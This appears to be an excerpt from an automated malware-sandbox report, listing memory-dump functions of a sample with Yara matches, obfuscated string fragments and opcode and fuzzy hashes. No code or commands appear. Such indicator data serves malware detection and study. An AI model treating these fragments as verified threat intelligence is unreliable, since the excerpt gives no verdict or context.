                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$)$IDAT$IEND$IHDR
                                                                        • API String ID: 0-3469842109
                                                                        • Opcode ID: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
                                                                        • Instruction ID: 257f26cc5f2a74aac9bf87ca9c2577b9cb81d69ed2dc1e03b5bd0bdbb9992778
                                                                        • Opcode Fuzzy Hash: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
                                                                        • Instruction Fuzzy Hash: C302E2B46083848FD704CF29D89176ABBE1EBC6304F14853EEA859B3D1D379D909CB96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$)$IDAT$IEND$IHDR
                                                                        • API String ID: 0-3469842109
                                                                        • Opcode ID: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
                                                                        • Instruction ID: 8e6d4bb32cb30192763ab4a68f17f9a86ee6ad894c6829c13deba2834ab42530
                                                                        • Opcode Fuzzy Hash: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
                                                                        • Instruction Fuzzy Hash: 770212746483848FE714CF28C89176BBBE2EFC6300F15866DE9858B391D375DA09CB96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !oW1$#"2.$C$P$RRP\
                                                                        • API String ID: 0-2182630447
                                                                        • Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                        • Instruction ID: 099b8e97d4c783248d299f08155666f1876e613e1bac2d45a50adfc1c6749069
                                                                        • Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                        • Instruction Fuzzy Hash: B8C1167221C3918BD3258F29D49076BBFE2AFD3304F18896DE4D44B3C6D679890AC796
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !oW1$#"2.$C$P$RRP\
                                                                        • API String ID: 0-2182630447
                                                                        • Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                        • Instruction ID: 897cf8d110775c286b70a36ac95e566d1f574dccc8c852c96ada2349328878fb
                                                                        • Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
                                                                        • Instruction Fuzzy Hash: 5CC1077125C3918FD3258F29C49176BBFE2AFD3204F18896DE4D54B382D7B9850ACB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,fbV$d~`}$lvhu$ooKv$sf
                                                                        • API String ID: 0-4157365443
                                                                        • Opcode ID: d0a6585cca3ad9a47c54e6056bc46f80964016baf11be8ce0a27bf085c007181
                                                                        • Instruction ID: aaedd27545ab9ed709b9694aed24c663919bae5b675873c34d327438eaef385a
                                                                        • Opcode Fuzzy Hash: d0a6585cca3ad9a47c54e6056bc46f80964016baf11be8ce0a27bf085c007181
                                                                        • Instruction Fuzzy Hash: 14E139B15483518FD714CF24D8817ABB7E2AFD1304F48896DE9D587382E679E908C78B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *+$6D135015ECAF0672D0632DF0E28DC412$kh$nz${u
                                                                        • API String ID: 0-4082600940
                                                                        • Opcode ID: 0a6dafd6ef2ba7b0d43a2a51019282152f096bc3ad18055503bec8102e7ee30b
                                                                        • Instruction ID: 1b29a9faac5300f3ffc5f62fe3d46617b85d137f0c3ce0abae63967b27c05819
                                                                        • Opcode Fuzzy Hash: 0a6dafd6ef2ba7b0d43a2a51019282152f096bc3ad18055503bec8102e7ee30b
                                                                        • Instruction Fuzzy Hash: 2AD103716087508BD724DF35C851BABBBE2EFC1318F18896DE4D59B392D638C809CB46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *+$6D135015ECAF0672D0632DF0E28DC412$kh$nz${u
                                                                        • API String ID: 0-4082600940
                                                                        • Opcode ID: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
                                                                        • Instruction ID: 5e5e27deb3d2a1c537a00745a71f84644d2ba910051428d74b7bbeecbd20bb9e
                                                                        • Opcode Fuzzy Hash: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
                                                                        • Instruction Fuzzy Hash: 07D1E1716483508BD724DF38C895BABBBE2EFC1318F19896DE4D68B291D774C409CB46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,fbV$d~`}$lvhu$ooKv$sf
                                                                        • API String ID: 0-4157365443
                                                                        • Opcode ID: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
                                                                        • Instruction ID: 3ce4e13da70521d705ae5f6e24ac8a59c1511936024153af7c71e716a489135a
                                                                        • Opcode Fuzzy Hash: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
                                                                        • Instruction Fuzzy Hash: 0BD11AB15883519FD714CF14C8917ABB7E2AFC5304F088A6CE9D987341E779DA09CB82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BVAI$_Pna$mc$t
                                                                        • API String ID: 0-1770441902
                                                                        • Opcode ID: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
                                                                        • Instruction ID: 048c6723a0782cba0ed5f5bfde42b0dc355c8231af3653691a455654dcaa2d5e
                                                                        • Opcode Fuzzy Hash: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
                                                                        • Instruction Fuzzy Hash: 03A1C37050C3D18AE739CF2594103ABBBE1AFD7304F58897ED0D997382DB79814A8B5A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BVAI$_Pna$mc$t
                                                                        • API String ID: 0-1770441902
                                                                        • Opcode ID: 20e5745e1b694ac32ec1dc69cbed19167deee9fde80c6a8e98dc18cec2597528
                                                                        • Instruction ID: 4047fce370677364bf8d5afb992164435ea9c2f4a4f2e4e36ab6b91b84e60207
                                                                        • Opcode Fuzzy Hash: 20e5745e1b694ac32ec1dc69cbed19167deee9fde80c6a8e98dc18cec2597528
                                                                        • Instruction Fuzzy Hash: E8A1C37054C3C18AE739CF2584147BBBBE1AFDB304F1889ADD0D997682DB75810ACB56
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$8<j?$D$4b
                                                                        • API String ID: 0-1320392364
                                                                        • Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                        • Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
                                                                        • Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
                                                                        • Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: v$v$bt$zi
                                                                        • API String ID: 0-1945541540
                                                                        • Opcode ID: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
                                                                        • Instruction ID: bba7ce1cbd9d7b5964ace128991244c7d88d52c60c2cfa081a52f8c92ce1e01e
                                                                        • Opcode Fuzzy Hash: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
                                                                        • Instruction Fuzzy Hash: 48D1687260C3558FD725CF28D45069FFBE6EBC4304F06892DE8A99B281D774D60ACB86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 'P0V$,D,J$9HiN$WT
                                                                        • API String ID: 0-3770969982
                                                                        • Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                        • Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
                                                                        • Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
                                                                        • Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 'P0V$,D,J$9HiN$WT
                                                                        • API String ID: 0-3770969982
                                                                        • Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                        • Instruction ID: b4a9819ccf9ab4142317871775d7faac46e56018a066af9deb909ff3f81b69f0
                                                                        • Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
                                                                        • Instruction Fuzzy Hash: C271C0B554D3958BD304DF12C8802AFBBE2FBD1314F188E6CE5D86B251C739854A8F86
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FOOE$KGFU$KGFU$UUQg
                                                                        • API String ID: 0-60738199
                                                                        • Opcode ID: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
                                                                        • Instruction ID: 30b6f5b4f41cb0ee82054490a87695466501120042a88d8048b4101af8181fce
                                                                        • Opcode Fuzzy Hash: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
                                                                        • Instruction Fuzzy Hash: DD517F729D1262CFD7158B68C8421AAFBA2EF55320B1E46A5CC758B3C1D334E903C791
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ijkdefgau`c$au`c$defgau`c
                                                                        • API String ID: 0-3415814675
                                                                        • Opcode ID: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
                                                                        • Instruction ID: e412760159858d4848ab6cf72f2a78b90201a68ad62c931e8edb79d67d371b9b
                                                                        • Opcode Fuzzy Hash: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
                                                                        • Instruction Fuzzy Hash: 02D1F0B26483408FD714DF28C891BABBBE1EFC5318F14896CE9958B390E775D805CB52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$.$K
                                                                        • API String ID: 0-4278605028
                                                                        • Opcode ID: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                        • Instruction ID: 6a15d43e6d9dc7541644536baa1fca88b34eed3a23bb6af0385b7f8a4183f52c
                                                                        • Opcode Fuzzy Hash: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                        • Instruction Fuzzy Hash: 69029E71614BC08BE3158F3DC891392BFE2AB56304F1CC9AED4DACB787C229E5458B65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$.$K
                                                                        • API String ID: 0-4278605028
                                                                        • Opcode ID: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                        • Instruction ID: 6f1199606bed5220cd47cf38a50aa8a124b781985d6e80a95cb99eebee9c7c2d
                                                                        • Opcode Fuzzy Hash: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                        • Instruction Fuzzy Hash: 26029E71614BC08BE3198F3DC891362BFE2AB56304F0CC9ADD4DACB786C269E5458B65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8<j?$D$4b
                                                                        • API String ID: 0-2390459867
                                                                        • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                        • Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
                                                                        • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                        • Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8<j?$D$4b
                                                                        • API String ID: 0-2390459867
                                                                        • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                        • Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
                                                                        • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                        • Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8<j?$D$4b
                                                                        • API String ID: 0-2390459867
                                                                        • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                        • Instruction ID: ed1329f5f1f87e40a9abe0537753f181d9ad9564c01af0512b04a085da4e7ed5
                                                                        • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                        • Instruction Fuzzy Hash: 5781FB6024C3918BD718CF3984A137AFBD29FD6218F2C89AEE4E58B281D779C506C716
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #=0$Z$ut
                                                                        • API String ID: 0-1971374411
                                                                        • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                        • Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
                                                                        • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                        • Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #=0$Z$ut
                                                                        • API String ID: 0-1971374411
                                                                        • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                        • Instruction ID: 71c3ad498d9cc938b4352fc7cb248fd90acdadaae95e8d1daa20049a0cefb40e
                                                                        • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                        • Instruction Fuzzy Hash: D081263110C7828AD7068F38C55077AFFE2AF93318F1899ADD4D29B792D769C50AC752
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8<j?$D$4b
                                                                        • API String ID: 0-2390459867
                                                                        • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                        • Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
                                                                        • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                        • Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8<j?$D$4b
                                                                        • API String ID: 0-2390459867
                                                                        • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                        • Instruction ID: 9b8fb97247d6a8927f2cc60c4bb830291f2c20504eaa8b7b6e259e58eae4f839
                                                                        • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                        • Instruction Fuzzy Hash: 7A810C6124C3918BD719CF3984A137AFFD29FD6218F1C49ADE4E18B281D339C50ACB56
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: D`a&$NMNO$bX_^
                                                                        • API String ID: 2994545307-620122162
                                                                        • Opcode ID: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                        • Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
                                                                        • Opcode Fuzzy Hash: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                        • Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$7$gfff
                                                                        • API String ID: 0-3859371245
                                                                        • Opcode ID: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
                                                                        • Instruction ID: 9f03ba7914f0360cb7709cea8ad3b28f347f0d2189de7c473bd193f5a0b7fd0c
                                                                        • Opcode Fuzzy Hash: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
                                                                        • Instruction Fuzzy Hash: D4812572A142118BD324CF28DC417AB77E2EBC8314F18C92ED985DB395EB3CD8468785
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$7$gfff
                                                                        • API String ID: 0-3859371245
                                                                        • Opcode ID: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
                                                                        • Instruction ID: c2ef9608447236b80a018974e6c68b245ee3a5a24aca89d030d19336b344b6a2
                                                                        • Opcode Fuzzy Hash: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
                                                                        • Instruction Fuzzy Hash: FE812872A542518BD328CF28CC51BAF77E2EBC4314F1AC92DD489DB395EB38D5068B85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FOOE$KGFU$UUQg
                                                                        • API String ID: 0-2281124432
                                                                        • Opcode ID: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
                                                                        • Instruction ID: e3d0f05a3102c402a5be3d16b6d50dde008b8d5973f854c9b7a8b98ef3316d4d
                                                                        • Opcode Fuzzy Hash: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
                                                                        • Instruction Fuzzy Hash: 9A619D72B49262CFD710CBA4D8402AAF7A2EF55310B5D42ABD8558B382E33CDD12D3A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5230$I`af$t]ae
                                                                        • API String ID: 0-812676372
                                                                        • Opcode ID: 69b55e9c59f984ca031ddda7f553905b2866cdbf307ebf2f1898f1c112d00d2e
                                                                        • Instruction ID: cc3bff843b66776ddd05c04f0bda8cfb631fd3a3b5e3538274f97fe5caba7e22
                                                                        • Opcode Fuzzy Hash: 69b55e9c59f984ca031ddda7f553905b2866cdbf307ebf2f1898f1c112d00d2e
                                                                        • Instruction Fuzzy Hash: D7515972A15B804FD738CF66C891767BBE3ABA5304F19896DC1C287695DABCA405C704
                                                                        Strings
                                                                        Memory Dump Source
